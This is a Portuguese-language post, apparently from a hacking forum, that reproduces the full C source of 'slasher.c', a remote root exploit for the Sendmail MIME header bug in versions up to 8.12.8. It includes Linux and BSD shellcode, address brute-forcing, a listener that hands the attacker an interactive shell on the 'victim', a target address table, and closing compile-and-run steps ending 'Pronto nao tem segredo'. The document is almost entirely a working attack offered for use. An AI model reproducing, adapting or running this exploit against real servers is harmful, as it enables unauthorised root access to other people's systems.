|
Para isso vamos usar o exploit slasher.c codigo abaixo
----------------------
/*
Slasher - Slashing the stack for fun and profit
A +4 remote root exploit for '-1 gone wild' bug in Sendmail <=
8.12.8
Version 0.9b by Blazde (MIME artist for the day)
"Jurri the Rogue fingers his lockpicks and deftly slips one
into the
lock. It's trapped, but Jurri is skilled... with a soft click, the
trap
is disarmed. The door creaks open, revealing a dimly lit corridor."
- EoB [Waterdeep, somewhere above Slasher]
Props to
o Michal Zalewski / lcamtuf for finding the bug
o All the 0dd ppl
o LSD for bits of this code (and for putting up with Argus's crap)
o All who take the time to understand this thing
Notes:
- If MaxMimeHeaderLength is set (to less than ~6000) the exploit
won't
work. (By default it isn't enabled until the 8.12.9 patch, but some
distributions (FreeBSD for instance) come with it in their config
files. For testing, you can disable it by commenting out the
O MaxMimeHeaderLength=?/?
line in sendmail.cf (usually in /etc/mail).
- The victim sendmail server must let you relay mail through it.
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/poll.h>
#include <netinet/in.h>
#include <errno.h>
#include <netdb.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#define SMTPPORT 25
#define MAXNESTS 20
#define SMTPREPLYBUFLEN 0x800
/* Used for automatic brute forcing */
#define SMTPREPLYBUFADDRMIN (0x080E6CE0 - 1024 * 10)
#define STDIN 0
#define STDOUT 1
#define NOP (char)0x90
typedef char bool;
#define true 1
#define false 0
bool Verbose = false;
unsigned int Timeout = 30; /* Seconds */
int LinuxShellcodeLen = 70 + 45;
char LinuxShellcode[] =
/* 70 bytes findsckcode by LSD, modified to use port 25, */
/* eliminate \n and fix ax/bx typos :p */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xe7" /* movl %esp,%edi */
"\x8d\x77\x10" /* leal 0x10(%edi),%esi */
"\x89\x77\x04" /* movl %esi,0x4(%edi) */
"\x8d\x4f\x20" /* leal 0x20(%edi),%ecx */
"\x89\x4f\x08" /* movl %ecx,0x8(%edi) */
"\xb3\x10" /* movb $0x10,%bl */
"\x89\x19" /* movl %ebx,(%ecx) */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb1\xff" /* movb $0xff,%cl */
"\x89\x0f" /* movl %ecx,(%edi) */
"\x51" /* pushl %ecx */
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x07" /* movb $0x07,%bl */
"\x89\xf9" /* movl %edi,%ecx */
"\xcd\x80" /* int $0x80 */
"\x59" /* popl %ecx */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x39\xd8" /* cmpl %ebx,%eax */
"\x75\x08" /* jne <findsckcode+52> */
"\xb4\x19" /* movb $0x19,%ah */
"\x66\x39\x46\x02" /* cmpw %ax,0x2(%esi) */
"\x74\x02" /* je <findsckcode+54> */
"\xe2\xe2" /* loop <findsckcode+24> */
"\x89\xcb" /* movl %ecx,%ebx */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb1\x03" /* movb $0x03,%cl */
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x3f" /* movb $0x3f,%al */
"\x49" /* decl %ecx */
"\xcd\x80" /* int $0x80 */
"\x41" /* incl %ecx */
"\xe2\xf6" /* loop <findsckcode+60> */
/* 45 byte execve("/bin/sh", ["/bin/sh"], 0);
by Aleph One */
"\xeb\x1f" /* jmp 80483c5 <main+0x21> */
"\x5e" /* pop %esi */
"\x89\x76\x08" /* mov %esi,0x8(%esi) */
"\x31\xc0" /* xor %eax,%eax */
"\x88\x46\x07" /* mov %al,0x7(%esi) */
"\x89\x46\x0c" /* mov %eax,0xc(%esi) */
"\xb0\x0b" /* mov $0xb,%al */
"\x89\xf3" /* mov %esi,%ebx */
"\x8d\x4e\x08" /* lea 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* lea 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xdb" /* xor %ebx,%ebx */
"\x89\xd8" /* mov %ebx,%eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int $0x80 */
"\xe8\xdc\xff\xff\xff" /* call 80483a6 <main+0x2>
*/
"/bin/sh";
int BSDShellcodeLen = 53 + 23;
char BSDShellcode[] =
/* 53 bytes findsck */
"\x83\xec\x10" /* sub $0x10, %esp */
"\x8b\xfc" /* movl %esp, %edi */
"\x6a\x10" /* pushl $0x10 */
"\x54" /* pushl %esp */
"\x57" /* pushl %edi */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb1\xff" /* movb $0xff,%cl */
"\x51" /* pushl %ecx */
"\x33\xc0" /* xorl %eax,%eax */
"\xb0\x1f" /* movb $0x1f,%al */
"\x51" /* pushl %ecx */
"\xcd\x80" /* int $0x80 */
"\x59" /* popl %ecx */
"\x59" /* popl %ecx */
"\x33\xdb" /* xorl %ebx,%ebx */
"\x3b\xc3" /* cmpl %ebx,%eax */
"\x75\x08" /* jne <findsckcode+39> */
"\xb7\x19" /* movb $0x19,%bh */
"\x66\x39\x5f\x02" /* cmpw %bx,0x2(%edi) */
"\x74\x02" /* je <findsckcode+39> */
"\xe2\xe6" /* loop <findsckcode+13> */
/* dup2loop: */
"\x8b\xd9" /* movl %ecx, %ebx */
"\xb1\x03" /* movb $0x03, %cl */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x53" /* pushl %ebx */
"\xb0\x5a" /* movb $0x5a, %al */
"\xcd\x80" /* int $0x80 */
"\x40" /* incl %eax */
"\xe2\xf6" /* loop dup2loop */
/* 23 bytes execv("/bin/sh", ...) */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x54" /* pushl %esp */
"\x53" /* pushl %ebx */
"\x50" /* pushl %eax */
"\xb0\x3b" /* movb $0x3b,%al */
"\xcd\x80" /* int $0x80 */
;
void sendpacket(int socket, char* line, int len) {
if(len == -1) len = strlen(line);
if(Verbose && len < 500) write(STDOUT, line, len);
if(send(socket, line, len, 0) < 0) {
perror("send() while sending SMTP data");
exit(-5);
}
}
char* recvpacket(int socket, bool accepterror) {
int count;
struct pollfd polls;
static char buffer[1024 * 10];
polls.fd = socket;
polls.events = POLLIN;
if((count = poll(&polls, 1, Timeout * 1000)) <= 0) {
if(accepterror) return NULL;
perror("poll() while recieving SMTP data");
exit(-13);
}
if((count = recvfrom(socket, buffer, sizeof(buffer) - 1, 0,
NULL, 0)) <= 0) {
if(accepterror) return NULL;
perror("recvfrom() while receiving SMTP data");
exit(-6);
}
buffer[count] = '\0';
if(Verbose && count < 500) write(STDOUT, buffer, count);
return buffer;
}
int main(int argc, char** argv) {
int count, count2;
char buffer[1024 * 10];
unsigned int len;
char c;
char *ptr, *ptr2;
sigset_t signalmask;
struct timeval timestruct;
/* Network stuff */
int srvsocket, clisocket;
struct sockaddr_in addressin, addressout;
struct hostent *hp;
fd_set readfs;
/* Options */
bool sendmail = true, recvmail = true, bruteforce = false;
bool firsttry = true, validtargetaddr = true;
char *localhost = NULL, *localip = NULL;
char localipbuf[256];
char localhostbuf[256];
char *victimaddress = NULL;
unsigned int smtpreplybufaddr = 0;
unsigned char landingzone[4];
unsigned int localport = SMTPPORT;
unsigned int remoteport = SMTPPORT;
unsigned int method = 1;
unsigned int nesting = 1;
/* Default stack distances cover 584 to 594 inclusive */
unsigned int stackdist = 589, tmpstackdist;
unsigned int stackdistfuzz = 5;
char* shellcode = LinuxShellcode;
int shellcodelen = LinuxShellcodeLen;
if(argc < 2) {
printf("Usage: %s Target -b [options]\n", argv[0]);
printf(" %s Target -a 0x0ADD8355 [options]\n", argv[0]);
printf("Options...\n"
"\t-a Single or brute force starting SmtpReplyBuffer "
"Address (base 16)\n"
"\t-b Brute force SmtpReplyBuffer Address (specify "
"start address with -a)\n"
"\t-o Target Platform [Linux/BSD], default is Linux\n"
"\t-i Local IP, default is to see what sendmail "
"thinks it is\n"
"\t-l Local domain name with MX/A record to localhost\n"
"\t-p Local Port, default is %d\n"
"\t-q Remote Port, default is %d\n"
"\t-m EBP Subversion Method (1, 2), default is %d\n"
"\t-d Stack Distance, default %d\n"
"\t-f Fuzzy Stack Distance, try this many different "
"stack distances\n"
"\t either side of specified, one in the same mail, "
"default is %d\n"
"\t-t Network Timeout, default is %d\n"
/*"\t-n Nesting, default is %d\n"*/
"\t-s Send mail only\n"
"\t-r Receive mail only\n"
"\t-v Verbose\n\n", localport, remoteport, method,
stackdist, stackdistfuzz, Timeout/*, nesting */);
printf(
"Origin / Version SMTPReplyBuffer Stack Dist Exploitable? \n"
"RedHat 9.0 / 8.12.8-5 0x08107420 Is really 8.12.9\n"
"Mandrake 9.1 / 8.12.8-1 0x081061C0 592 Doesn't keep ebp\n"
"Unoptimized / 8.12.6 0x080F09A0 608 Yes \n"
"Debug / 8.12.6 0x080D5E20 592 Yes \n"
"RedHat 8.0 / 8.12.5-7 0x080F74A0 592 Yes \n"
"FreeBSD 4.7 / 8.12.6 0x080E6CE0 586 No (*) \n"
"\n(*MaxMimeHeaderLength set by default on FreeBSD but the
binary is"
" exploitable)\n");
exit(0);
}
while((c = getopt(argc - 1, &argv[1],
"a:bi:l:t:m:n:d:f:p:q:o:srv")) != -1) {
switch(c) {
case 'a':
smtpreplybufaddr = strtoul(optarg, NULL, 16);
break;
case 'b':
bruteforce = true;
break;
case 'i':
localhost = NULL;
localip = optarg;
break;
case 'l':
localip = NULL;
localhost = optarg;
break;
case 'm':
method = atoi(optarg);
break;
case 'n':
nesting = atoi(optarg);
printf("Nesting is unimplemented, sorry\n");
break;
case 'd':
stackdist = atoi(optarg);
break;
case 'f':
stackdistfuzz = atoi(optarg);
if(stackdistfuzz > 20) printf("Warning, fuzz is "
"kinda high, hope you got the bandwidth\n");
break;
case 'p':
localport = atoi(optarg);
break;
case 'q':
remoteport = atoi(optarg);
break;
case 'o':
if(!strcasecmp(optarg, "Linux")) {
shellcode = LinuxShellcode;
shellcodelen = LinuxShellcodeLen;
} else if(!strcasecmp(optarg, "BSD")) {
shellcode = BSDShellcode;
shellcodelen = BSDShellcodeLen;
}
break;
case 't':
Timeout = atoi(optarg);
break;
case 's':
sendmail = true;
recvmail = false;
break;
case 'r':
recvmail = true;
sendmail = false;
break;
case 'v':
Verbose = true;
break;
default:
exit(-1);
}
}
if(recvmail) {
/* Listen to recieve a mail from victim */
srvsocket = socket(AF_INET, SOCK_STREAM, 0);
bzero(&addressin, sizeof(addressin));
addressin.sin_family = AF_INET;
addressin.sin_port = htons(localport);
if(bind(srvsocket, (struct sockaddr*)&addressin,
sizeof(addressin))) {
perror("bind() on srvsocket");
exit(-1);
}
if(listen(srvsocket, -1)) {
perror("listen() on srvsocket");
exit(-2);
}
}
if(sendmail) {
victimaddress = argv[1];
bzero(&addressout, sizeof(addressout));
addressout.sin_family = AF_INET;
addressout.sin_port = htons(remoteport);
if(!inet_aton(victimaddress, &addressout.sin_addr)) {
if((hp = gethostbyname(victimaddress)) == NULL) {
perror("gethostbyname() on victim hostname");
exit(-3);
}
memcpy(&addressout.sin_addr.s_addr, hp->h_addr, 4);
}
if(!smtpreplybufaddr && recvmail) {
printf("No SmtpReplyBuffer address specified, brute "
"forcing from %.8X. Grab a cofee.\n", SMTPREPLYBUFADDRMIN);
smtpreplybufaddr = SMTPREPLYBUFADDRMIN;
bruteforce = true;
} else if(!smtpreplybufaddr) {
printf("Must specify an SmtpReplyBuffer address for send "
"only mode\n");
exit(0);
}
/* If the bruteforce increment is too small we won't make
it past some addresses */
if(bruteforce && (((SMTPREPLYBUFLEN - 8) - shellcodelen)
<= 512)) printf("Warning, shellcode too big\n");
}
while(bruteforce || firsttry) {
if(sendmail) {
if(bruteforce && !firsttry) smtpreplybufaddr +=
((SMTPREPLYBUFLEN - 8) - shellcodelen);
validtargetaddr = true;
/* Aim for the middle of the buffer */
count = htonl(smtpreplybufaddr + shellcodelen +
(SMTPREPLYBUFLEN - shellcodelen) / 2);
landingzone[0] = (char)(count & 0xFF);
landingzone[1] = (char)((count & 0xFF00) >> 8);
landingzone[2] = (char)((count & 0xFF0000) >> 16);
landingzone[3] = (char)((count & 0xFF000000) >> 24);
/* This is designed to fix some illegal chars in the address
or bail if they can't be fixed. If bruteforcing it tries
it's best not to miss any of the range. Messy huh?
This is the kind of code that makes sendmail what
it is.... ;) */
for(count = 0; count < 4; count++) {
if(landingzone[count] == '\0' ||
landingzone[count] == '\"' ||
landingzone[count] == '\n' ||
landingzone[count] == (unsigned char)0xFF ||
(landingzone[count] >= 0200 &&
landingzone[count] <= 0237)) {
if(count == 3) {
if(landingzone[3] != '\0') landingzone[3]--;
else landingzone[3]++;
count--; /* Recheck */
} else if(count == 2 && !(landingzone[2] > 0200 &&
landingzone[2] <= 0237)) {
if(landingzone[2] != '\0') {
landingzone[2]--;
smtpreplybufaddr -= (landingzone[3] + 2);
landingzone[3] = (char)0xFE;
} else {
landingzone[2] -= 2;
smtpreplybufaddr -= (landingzone[3] + 2 + 256);
landingzone[3] = 0xFE;
}
} else {
printf("Target address (%.8X) contains unfixable "
"illegal char, skipping.\n", *(int*)landingzone);
validtargetaddr = false;
count = 4;
}
}
}
}
if(validtargetaddr && sendmail) {
/* Send mail to the victim */
clisocket = socket(AF_INET, SOCK_STREAM, 0);
if(connect(clisocket, (struct sockaddr*)&addressout,
sizeof(addressout))) {
perror("connect() to victim's sendmail");
exit(-4);
}
ptr = recvpacket(clisocket, false);
if(!Verbose && firsttry) printf("%s", ptr);
sendpacket(clisocket, "EHLO localhost\n", -1);
if(!strstr(ptr = recvpacket(clisocket, false), "250"))
printf("%s", ptr);
if(!localhost && !localip) {
localipbuf[0] = '\0';
localhostbuf[0] = '\0';
ptr = (char*)strstr(ptr, " Hello ");
if(!ptr) break;
ptr = &ptr[7];
ptr2 = ptr;
while(*ptr2 && (*ptr2 != ']')) ptr2++;
*ptr2 = '\0';
sscanf(ptr, "%255s [%255s", localhostbuf, localipbuf);
if(localipbuf[0]) localip = localipbuf;
else if(localhostbuf[0]) localhost = localhostbuf;
}
if(!localhost && !localip) {
printf("Couldn't get our hostname or IP from the victim. "
"Please specify either or both on the cmd line.\n");
close(clisocket);
if(recvmail) close(srvsocket);
exit(0);
}
if(localhost) sprintf(buffer, "MAIL FROM: slasher@%s BODY="
"8BITMIME\n", localhost);
else if(localip) sprintf(buffer, "MAIL FROM: slasher@[%s] BODY"
"=8BITMIME\n", localip);
sendpacket(clisocket, buffer, -1);
if(localip) {
sprintf(buffer, "RCPT TO: root@localhost\n");//, localip);
sendpacket(clisocket, buffer, -1);
}
if(localhost) {
sprintf(buffer, "RCPT TO: root@localhost\n");//, localhost);
sendpacket(clisocket, buffer, -1);
}
sendpacket(clisocket, "DATA\n", -1);
while(!strstr(ptr = recvpacket(clisocket, false), "\n354"))
printf("%s", ptr);
if(firsttry) printf("Sendmail is accepting our mail.\n");
for(count = 0; count < MAXNESTS + 1; count++) {
len = 0;
if(count != MAXNESTS)
len += sprintf(buffer, "Content-Type: multipart/mixed;"
" boundary=\"%d\"\n", count);
else buffer[0] = '\0';
len += sprintf(&buffer[len],
"Content-Transfer-Encoding: \"aaa");
count2 = len;
while(len - count2 < 509 * 4) {
buffer[len++] = landingzone[3];
buffer[len++] = landingzone[2];
buffer[len++] = landingzone[1];
buffer[len++] = landingzone[0];
}
len = count2 + 509 * 4;
len += sprintf(&buffer[len], (count == MAXNESTS) ? "\n\n"
: "\n\n--%d\n", count);
sendpacket(clisocket, buffer, len);
}
len = 0;
for(count = MAXNESTS - 1; count > 0; count--)
len += sprintf(&buffer[len], "--%d--\n", count);
sendpacket(clisocket, buffer, len);
tmpstackdist = stackdist;
if(stackdistfuzz) tmpstackdist -= stackdistfuzz;
if(firsttry) {
if(stackdistfuzz)
printf("Trying stack distance from %d to %d\n",
tmpstackdist, tmpstackdist + stackdistfuzz * 2 + 1);
else
printf("Trying stack distance of %d\n", tmpstackdist);
}
printf("Trying SmtpReplyBuffer address of %.8X (computed LZ
%.8X)\n",
smtpreplybufaddr, *(int*)landingzone);
for(count = 0; count < stackdistfuzz * 2 + 1; count++) {
len = 0;
len += sprintf(buffer, "--0\n"
"Content-Type: message/rfc822\n\n"
"Content-Type: text/plain\n"
"Content-Transfer-Encoding: \"aaa");
count2 = len;
while(len - count2 < 509 * 4) {
buffer[len++] = landingzone[3];
buffer[len++] = landingzone[2];
buffer[len++] = landingzone[1];
buffer[len++] = landingzone[0];
}
len = count2 + 509 * 4;
for(count2 = 0; count2 < tmpstackdist * 4 + 1; count2++) {
buffer[len++] = '\\';
buffer[len++] = (char)0xFF;
}
if(method == 2) {
buffer[len++] = '\\';
buffer[len++] = 'a';
}
buffer[len++] = '\n';
buffer[len++] = '\n';
buffer[len] = '\0';
sendpacket(clisocket, buffer, len);
tmpstackdist++;
}
sendpacket(clisocket, "--0--\n.\nQUIT\n", -1);
close(clisocket);
}
if(firsttry && validtargetaddr) {
if(sendmail && recvmail) printf("Trigger mail sent.
Hopefully"
" we'll hear a knock anytime now\n");
else if(recvmail) printf("Awaiting mail from sendmail, this
"
"can take a while\n");
else if(sendmail) printf("Trigger mail sent\n");
}
if(recvmail && validtargetaddr) {
FD_ZERO(&readfs);
FD_SET(srvsocket, &readfs);
timestruct.tv_sec = Timeout;
timestruct.tv_usec = 0;
if(select(srvsocket + 1, &readfs, NULL, NULL,
(bruteforce ? NULL : ×truct)) <= 0) {
perror("select() error waiting for callback");
close(srvsocket);
exit(-10);
}
if(firsttry) printf("Sendmail has returned our call...\n");
count = sizeof(struct sockaddr_in);
if((clisocket = accept(srvsocket, (struct sockaddr*)
&addressin, &count)) < 0) {
perror("accept() sendmail's callback");
exit(-9);
}
if(!bruteforce) close(srvsocket);
sendpacket(clisocket, "220 Hello\n", -1);
recvpacket(clisocket, false);
sendpacket(clisocket, "250 I'm about to own you\n", -1);
recvpacket(clisocket, false);
sendpacket(clisocket, "250 How does that make you feel?\n",
-1);
recvpacket(clisocket, false);
sendpacket(clisocket, "250 Hmm well, nice talkin\n", -1);
count = 0;
count += sprintf(buffer, "354 ");
for(count2 = 0; count2 < shellcodelen; count2++)
buffer[count++] = shellcode[count2];
while(count < SMTPREPLYBUFLEN) buffer[count++] = NOP;
/* jmp -(SMTPREPLYBUFLEN - 14) */
buffer[SMTPREPLYBUFLEN - 6] = (char)0xE9;
buffer[SMTPREPLYBUFLEN - 5] =
(char)((-(SMTPREPLYBUFLEN - 5)) & 0xFF);
buffer[SMTPREPLYBUFLEN - 4] =
(char)(((-(SMTPREPLYBUFLEN - 5)) & 0xFF00) >> 8);
buffer[SMTPREPLYBUFLEN - 3] =
(char)(((-(SMTPREPLYBUFLEN - 5)) & 0xFF0000) >> 16);
buffer[SMTPREPLYBUFLEN - 2] =
(char)(((-(SMTPREPLYBUFLEN - 5)) & 0xFF000000) >> 24);
buffer[SMTPREPLYBUFLEN - 1] = '\n';
recvpacket(clisocket, false);
sendpacket(clisocket, buffer, SMTPREPLYBUFLEN);
/* Cross fingers */
sleep(1); /* With we didn't need this */
sendpacket(clisocket, "TERM=xterm exec bash -i;\n", -1);
if(!(ptr = recvpacket(clisocket, true))) {
if(firsttry) printf("Appears to have crashed without "
"spawning shell\n");
if(bruteforce) {
firsttry = false;
continue;
} else {
printf("Try different SmtpReplyBuffer address\n");
exit(0);
}
}
if(strstr(ptr, "MIME-Version: 1.0")) {
while(ptr && !strstr(ptr, "\n."))
ptr = recvpacket(clisocket, true);
if(ptr) {
close(clisocket);
printf("Didn't seem to crash maybe try a higher stack "
"distance\n");
}
if(bruteforce) {
firsttry = false;
continue;
} else {
close(srvsocket);
exit(0);
}
}
/* If we make it this far (hopefully) we have a shell */
printf("You might want to clean the mail queue ;)\n");
bruteforce = false;
printf("%s", ptr);
/* How many times have you Ctrl-C'd by accident after rooting
a box? Let's knock it on the head. */
sigemptyset(&signalmask);
sigaddset(&signalmask, SIGINT);
sigprocmask(SIG_BLOCK, &signalmask, NULL);
sendpacket(clisocket, "uname -a; whoami\n", -1);
while(1) {
FD_ZERO(&readfs);
FD_SET(STDIN, &readfs);
FD_SET(clisocket, &readfs);
if(select(clisocket + 1, &readfs, NULL, NULL, NULL) > 0)
{
if(FD_ISSET(STDIN, &readfs)) {
if((count = read(STDIN, buffer, 1024)) <= 0) {
if(errno == EWOULDBLOCK || errno == EAGAIN)
continue;
else {
perror("read() stdin");
exit(-11);
}
}
write(clisocket, buffer, count);
}
if(FD_ISSET(clisocket, &readfs)) {
if((count = read(clisocket, buffer, 1024)) <= 0) {
if(errno == EWOULDBLOCK || errno == EAGAIN)
continue;
else {
perror("read() from owned host");
exit(-12);
}
}
write(STDOUT, buffer, count);
}
} else exit(0);
}
}
firsttry = false;
}
}
agora é só compilar
gcc slasher.c -o slasher
./slasher vitima -a endereco-de-memoria
vitima = a vitma duh !
endereco de memoria = é a area da memoria q depende do sistema
Origin / Version SMTPReplyBuffer Stack Dist Exploitable?
RedHat 9.0 / 8.12.8-5 0x08107420 Is really 8.12.9
Mandrake 9.1 / 8.12.8-1 0x081061C0 592 Doesn't keep ebp
Unoptimized / 8.12.6 0x080F09A0 608 Yes
Debug / 8.12.6 0x080D5E20 592 Yes
RedHat 8.0 / 8.12.5-7 0x080F74A0 592 Yes
FreeBSD 4.7 / 8.12.6 0x080E6CE0 586 No (*)
Pronto nao tem segredo !!!
|
